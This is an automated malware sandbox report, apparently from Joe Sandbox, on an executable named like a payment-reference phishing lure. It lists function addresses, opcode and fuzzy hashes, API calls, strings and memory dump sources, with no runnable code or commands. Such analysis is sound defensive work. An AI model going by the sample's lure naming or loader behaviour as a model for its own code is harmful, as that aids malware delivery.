Instruction ID: 0a9f0b6ad9d30ebdcc1c340ded91534dbece2c2b4a2449182e8da1839048da9c
Opcode Fuzzy Hash: 2863dbc5f06d5d4c419c2aacd7626bd54ad9697db7e1f86450479b8c60997fd7
Instruction Fuzzy Hash: FA21E4B5900209DFDB10CF9AD584AEEBBF9FB48314F14841AE918A3350C374A940CF65

Function 048312C8 Relevance: 1.5, APIs: 1, Instructions: 49
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0483132D

Memory Dump Source

Source File: 00000000.00000002.2105167572.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4830000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 32b8ec855e52e96a5501dceec06522efda24d1871f1570bac3d91121dadb9b43
Instruction ID: 22e69bd86ce6d055d53bec5255b4f8eca3559a999e8416bbb2ad251912ce9dc6
Opcode Fuzzy Hash: 32b8ec855e52e96a5501dceec06522efda24d1871f1570bac3d91121dadb9b43
Instruction Fuzzy Hash: EF1125B58002499FDB10DF99D888BDEFBF8EB58310F108919E558A3201D379A944CFA1

Function 04CEAF78 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04CEAFDE

Memory Dump Source

Source File: 00000000.00000002.2105224116.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2ba7fa2bb190f3db40402e92079b78303a683e32f2c75662c1d43a6c66dd5a2d
Instruction ID: 5a3e7fe2b2f264965289bbc57c52b3f15897f5c6d0575d8d8368f3f803ad3133
Opcode Fuzzy Hash: 2ba7fa2bb190f3db40402e92079b78303a683e32f2c75662c1d43a6c66dd5a2d
Instruction Fuzzy Hash: 2411E0B6C002498FDB20CF9AC944ADEFBF9EB88324F14841AD429A7614C379A545CFA5

Function 048312D0 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0483132D

Memory Dump Source

Source File: 00000000.00000002.2105167572.0000000004830000.00000040.00000800.00020000.00000000.sdmp, Offset: 04830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4830000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b9abb5e2d3093663e19a2ac8b70cf71383ffe4928a4ad1fa7fc8c2d097bb9e1e
Instruction ID: e41ca1f53bc4c44acb1604560cdf73ba14ba3636d48d6aec5f29c667293644b4
Opcode Fuzzy Hash: b9abb5e2d3093663e19a2ac8b70cf71383ffe4928a4ad1fa7fc8c2d097bb9e1e
Instruction Fuzzy Hash: AB11E5B5800349DFDB10DF9AD989BDEFBF8EB48320F108419E558A7600C379A944CFA1

Function 025ED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102965498.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25ed000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74a9732b3f60a9035b07118ff21eb5ae2364dbb70294a9ccc5b9f9a2bdcdd3b8
Instruction ID: 42c9d0daa9f53270a135b011a2f8b88fff3c063611bd7b2295c898c6aaddfe59
Opcode Fuzzy Hash: 74a9732b3f60a9035b07118ff21eb5ae2364dbb70294a9ccc5b9f9a2bdcdd3b8
Instruction Fuzzy Hash: D921F476504204DFDF09DF14D9C0B16BF79FFA8324F24C569E90A0B256C37AE456C6A1

Function 025FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103044600.00000000025FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25fd000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 238b661a089c976fa343710448b51f0da4736ec9f7f0a85ed6b3348c5fb65aac
Instruction ID: 7a18fc2a776f3587108e3bc68fe5e53a0e6bfc9051e457f1e67e392944c3b1d6
Opcode Fuzzy Hash: 238b661a089c976fa343710448b51f0da4736ec9f7f0a85ed6b3348c5fb65aac
Instruction Fuzzy Hash: B0212275604200DFDB55DF14D980B26BFB9FB88324F20C96DEA0A4B646D33BD807CA65

Function 025FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103044600.00000000025FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25fd000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af3a5a0037d1158b7347f103ec9eb7cb6fae4d44b99c067af4148a5281105130
Instruction ID: 3a97713c34c8df28529f7fbf2088f05c0c6c6e5ceebcb17ef5cbf24dde93a66c
Opcode Fuzzy Hash: af3a5a0037d1158b7347f103ec9eb7cb6fae4d44b99c067af4148a5281105130
Instruction Fuzzy Hash: A1212671504200EFDB45DF14D9C0B26BFB5FB88314F24C96DEA0A4B256C33BD806CAA5

Function 025FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103044600.00000000025FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25fd000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca443fe04d85cf7c89499a7fc5fda230077edbfbff8e5bd744f62768a5081867
Instruction ID: 57836ea743918da0fa6786c01bb3e4381a4de3c7fb0589424a65c68b9067852b
Opcode Fuzzy Hash: ca443fe04d85cf7c89499a7fc5fda230077edbfbff8e5bd744f62768a5081867
Instruction Fuzzy Hash: B1218E755093808FCB02CF24D994715BF71FB46214F28C5EAD9898B6A7C33A980ACB62

Function 025ED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102965498.00000000025ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25ed000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: 51b46f67370934b3d48da9d293005a84cccb5bcab4d7c281d3fa1b6c3775a883
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: 8E11CD76404280CFCF0ACF00D5C4B16BF72FB94324F24C2A9D80A0A256C33AE45ACBA1

Function 025FD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103044600.00000000025FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25fd000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction ID: 65c708c4ed91c807f2916b91059ea73f7df322199eb532099e0045f1b72f21e5
Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
Instruction Fuzzy Hash: 0211BB76504280DFCB42CF10C5C4B16BFB1FB84314F24C6AED9494B296C33AD40ACBA1

Non-executed Functions

Function 04CED344 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2105224116.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aae1973ab6134c506d6c23e0ee998110d6392f2f52fe12a8d796d1d2cc0dac45
Instruction ID: 8dade6fb82cbe8bf1c9b8fbe217b72d532190b0916755e9709cfb8ab1d3442de
Opcode Fuzzy Hash: aae1973ab6134c506d6c23e0ee998110d6392f2f52fe12a8d796d1d2cc0dac45
Instruction Fuzzy Hash: 4DA15A36A00209DFCF05DFB6C8405AEB7B3FF89304B15856EE905AB265DB75EA16CB40

Analysis Process: NF_Payment_Ref_FAN930276.exePID: 1520, Parent PID: 4712COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5.1%
Signature Coverage:	8%
Total number of Nodes:	137
Total number of Limit Nodes:	11

Executed Functions

Function 00417563 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
Instruction ID: bdce513adcdf66a5ddf40d0a2ecde4d7099c94072a20f6ffb4ae009ad51faa44
Opcode Fuzzy Hash: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
Instruction Fuzzy Hash: B00171B1E0020DBBDF10DBE1DC42FDEB379AB54308F4081AAE90897241F634EB588B95

Function 0042C433 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C467

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction ID: 37a102a096cf0697ac499042812ebe3be0a6e3a94df1b2a833282852239f11ec
Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction Fuzzy Hash: 7DE04F766002147BD620BA5AEC41F97775CDFC5714F00801AFA0867282C675791087F5

Function 01B02B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B02B6A

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 85069bc0ca7f734c8f2753380ef146745debf78f2c20f2e0f32f9f26a4426048
Instruction ID: 678d27864f9d364d97f627f551b8c67ca264bf815e5beda357cbe868d719d9ad
Opcode Fuzzy Hash: 85069bc0ca7f734c8f2753380ef146745debf78f2c20f2e0f32f9f26a4426048
Instruction Fuzzy Hash: 1F90026325240003410971584414616500AA7E1201B96C061E1014591DC72589916225

Function 01B02DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B02DFA

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a0cac25d6effdafd3fa2b95039f6e72c6a771678aca9167a969ca07cbee775e7
Instruction ID: 0a23fe52fe973f0661dc69fcc859182a03ccb36938118b2ef2577260cb960d72
Opcode Fuzzy Hash: a0cac25d6effdafd3fa2b95039f6e72c6a771678aca9167a969ca07cbee775e7
Instruction Fuzzy Hash: 3E90023325140413D115715845047071009A7D1241FD6C452A0424559DD7568A52A221

Function 01B02C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B02C7A

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 476c17baec0c5c7bf010f0b63b2e28d9840345f8c1e30a278279e2ff3f3954ae
Instruction ID: 88162c982c6ca9c0ba46bd51e00e2f82a74fffe900a04918fde5de46da6fe29c
Opcode Fuzzy Hash: 476c17baec0c5c7bf010f0b63b2e28d9840345f8c1e30a278279e2ff3f3954ae
Instruction Fuzzy Hash: 7790023325148803D1147158840474A1005A7D1301F9AC451A4424659DC79589917221

Function 01B035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01B035CA

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: abb26d8dd4d1b539fae535a3a6fda7389f997848b16cd1ec4cb1720a9dd6e4a1
Instruction ID: 46cae4ae657655d4b0b43c06dbfa761f0952f0c60ddc3b8bd75c1332d893ec45
Opcode Fuzzy Hash: abb26d8dd4d1b539fae535a3a6fda7389f997848b16cd1ec4cb1720a9dd6e4a1
Instruction Fuzzy Hash: 4790023365550403D104715845147062005A7D1201FA6C451A0424569DC7958A5166A2

Function 00413D7A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ea64OHKq, xrefs: 00413E91, 00413E94
Ea64OHKq, xrefs: 00413E7F, 00413E89, 00413E9A

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID:
String ID: Ea64OHKq$Ea64OHKq
API String ID: 0-1999359540
Opcode ID: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
Instruction ID: 41e09621a5d42bbcee0aa685c486dca4cf25d64e691113f71131abf1b070321e
Opcode Fuzzy Hash: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
Instruction Fuzzy Hash: BE310F336043019FC710CE68ACC69EAB769EF85B1570445ABE144CF3A2E2298F83C788

Function 00413E0F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A

Strings

Ea64OHKq, xrefs: 00413E91, 00413E94
Ea64OHKq, xrefs: 00413E7F, 00413E89, 00413E9A

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: Ea64OHKq$Ea64OHKq
API String ID: 1836367815-1999359540
Opcode ID: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
Instruction ID: 62f55432ef48320368bfc7655e925e1af4bb88519bc3667248631d0393ebb683
Opcode Fuzzy Hash: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
Instruction Fuzzy Hash: 5C012671D0021C7AEB11ABE58C82DEF7B7CDF413A8F048169FA14AB241D67D4E068BB1

Function 00413E13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A

Strings

Ea64OHKq, xrefs: 00413E91, 00413E94
Ea64OHKq, xrefs: 00413E7F, 00413E89, 00413E9A

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: Ea64OHKq$Ea64OHKq
API String ID: 1836367815-1999359540
Opcode ID: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
Instruction ID: 832b8f0f82de43865680b143cd41517b910a90eb7c2e8913e91f4129158ae345
Opcode Fuzzy Hash: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
Instruction Fuzzy Hash: 10012671D0021C7AEB11AAE18C81DEF7B7CDF40398F048029FA0467241D57D4E058BB5

Function 0041760F Relevance: 1.5, APIs: 1, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
Instruction ID: 244a9be35222bc483ccb875c85ee509224bce84f5c57bb6526cc21583e77dac4
Opcode Fuzzy Hash: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
Instruction Fuzzy Hash: 81F062B1E04109BADF10DBA0DC91FDEB775AF14705F444266E80497641F635E7888795

Function 00417624 Relevance: 1.5, APIs: 1, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
Instruction ID: 3da201fd3e5f4a38d3ab40cb9ffbd160d6eadf765e117ee62af733f6e3875303
Opcode Fuzzy Hash: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
Instruction Fuzzy Hash: BDF09E39699B086BC3118BB998057C9B7E4FF42900F294198DDC9C6E53E363821AC781

Function 0042C763 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E354,?,?,00000000,?,0041E354,?,?,?), ref: 0042C7A2

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction ID: 8478ad7e8697ef7acc63e2c8c0b0e70c508952faf178b19bb78cdc86ac20e0b7
Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction Fuzzy Hash: 18E06DB27042047FD610EE59EC45F9B73ACEFC5714F004019F908A7282D770B9108AB5

Function 0042C7B3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,00416E48,000000F4), ref: 0042C7EF

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
Instruction ID: 0103aceadb78e79b7ecc8faacede7f1e09fa23b9d57152ecbc1c1368217fcbeb
Opcode Fuzzy Hash: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
Instruction Fuzzy Hash: 6DE06DB17002047BD610EE59EC81F9B33ADDFC5710F004019FE08A7241D671B9108AB9

Function 0042C803 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,355104C2,?,?,355104C2), ref: 0042C837

Memory Dump Source

Source File: 00000004.00000002.2264308195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_NF_Payment_Ref_FAN930276.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
Instruction ID: f8c1995de4c57a0dc7d95be7e0574ee260bed641c46f1d5501e4473e89b5d8ab
Opcode Fuzzy Hash: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
Instruction Fuzzy Hash: F9E04F756442147FD120BA9ADC41F97776CDFC5714F40401AFA1C67241C674790487F4

Function 01B02C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01B02C24

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: caeac1787419950f8b3d300d3ae4a166c1f01097aadfd5bedeffd894b333a90f
Instruction ID: 96cc5022c58a0e70c062a73b8e88c540ed15582a41978cfd82787951cd5f041c
Opcode Fuzzy Hash: caeac1787419950f8b3d300d3ae4a166c1f01097aadfd5bedeffd894b333a90f
Instruction Fuzzy Hash: FEB09B739415C5C6DA16E764460C7177D00B7D1701F56C0E5D2030687F8738C1D5E275

Non-executed Functions

Function 01B42349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

RaiseExceptionOnPossibleDeadlock, xrefs: 01B42579
UnloadEventTraceDepth, xrefs: 01B424C0
TracingFlags, xrefs: 01B42549
ExecuteOptions, xrefs: 01B425A0
minkernel\ntdll\ldrinit.c, xrefs: 01B43187
GlobalFlag2, xrefs: 01B42FC0
MinimumStackCommitInBytes, xrefs: 01B42BB0
DisableExceptionChainValidation, xrefs: 01B4275F
GlobalFlag, xrefs: 01B42F3F, 01B43059
DisableHeapLookaside, xrefs: 01B4246D
MaxLoaderThreads, xrefs: 01B424EC
UseImpersonatedDeviceMap, xrefs: 01B4251C
ShutdownFlags, xrefs: 01B424A1
MaxDeadActivationContexts, xrefs: 01B42D82
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01B43176
CFGOptions, xrefs: 01B42967
LdrpInitializeExecutionOptions, xrefs: 01B4317D
@, xrefs: 01B42942
@, xrefs: 01B42B74
FrontEndHeapDebugOptions, xrefs: 01B42489

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 417c257a3b805366330107fda32c923cce227681c3f06716d247cf170734c04a
Instruction ID: 5690a1c7cb5251ff17af8ca0e44b8ed22e73363d1613751c175805604e387e09
Opcode Fuzzy Hash: 417c257a3b805366330107fda32c923cce227681c3f06716d247cf170734c04a
Instruction Fuzzy Hash: EC92A071604342ABEB29DF19D880B6BBBE8FF84710F04899DFA94D7251D770D844EB92

Function 01AF8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section debug info address, xrefs: 01B3541F, 01B3552E
undeleted critical section in freed memory, xrefs: 01B3542B
Critical section address, xrefs: 01B35425, 01B354BC, 01B35534
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B354CE
corrupted critical section, xrefs: 01B354C2
Address of the debug info found in the active list., xrefs: 01B354AE, 01B354FA
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B3540A, 01B35496, 01B35519
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B354E2
Critical section address., xrefs: 01B35502
double initialized or corrupted critical section, xrefs: 01B35508
Invalid debug info address of this critical section, xrefs: 01B354B6
8, xrefs: 01B352E3
Thread identifier, xrefs: 01B3553A
Thread is in a state in which it cannot own a critical section, xrefs: 01B35543

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: b90a648eef062658d283a536ca47e39be6b9615a78ee8637beda5cf7fa224ee9
Instruction ID: 6146a8751fdfb7d84fcf149760488c52443b405ee0196c8893ddaff02eca0a8b
Opcode Fuzzy Hash: b90a648eef062658d283a536ca47e39be6b9615a78ee8637beda5cf7fa224ee9
Instruction Fuzzy Hash: 1881BCB0A40348BFDB24CF99C885BAEBBB9FF48704F544199F505B7681D3B9A944CB60

Function 01AF29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B32624
RtlpResolveAssemblyStorageMapEntry, xrefs: 01B3261F
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B32412
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B32409
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B322E4
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B32498
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B32602
@, xrefs: 01B3259B
